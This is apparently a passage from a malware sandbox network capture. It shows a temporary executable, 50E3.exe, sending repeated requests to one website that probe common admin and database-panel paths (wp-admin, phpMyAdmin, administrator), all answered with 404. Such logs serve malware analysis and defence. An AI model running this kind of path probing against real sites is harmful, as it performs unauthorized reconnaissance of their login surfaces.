2023-11-30 10:23:30 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:31 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:30 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:31 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.4	65272	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:30 UTC	160	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:31 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:31 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:31 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.4	65463	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:30 UTC	203	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
2023-11-30 10:23:31 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:31 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:31 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
154	192.168.2.4	50128	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:31 UTC	219	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
2023-11-30 10:23:31 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:31 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:31 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
155	192.168.2.4	50304	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:31 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:31 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:31 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:31 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
156	192.168.2.4	51408	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:31 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:31 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:31 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:31 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
157	192.168.2.4	51655	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:31 UTC	167	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:32 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:31 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:32 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
158	192.168.2.4	52355	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:31 UTC	162	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:32 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:32 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:32 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
159	192.168.2.4	52717	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:31 UTC	165	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:32 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:32 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:32 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
160	192.168.2.4	53530	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:32 UTC	168	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:32 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:32 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:32 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
161	192.168.2.4	53772	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:32 UTC	160	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:32 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:32 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:32 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.4	56437	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:32 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:23:33 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 33 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:23:33 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:23:33 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
163	192.168.2.4	56691	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:23:32 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
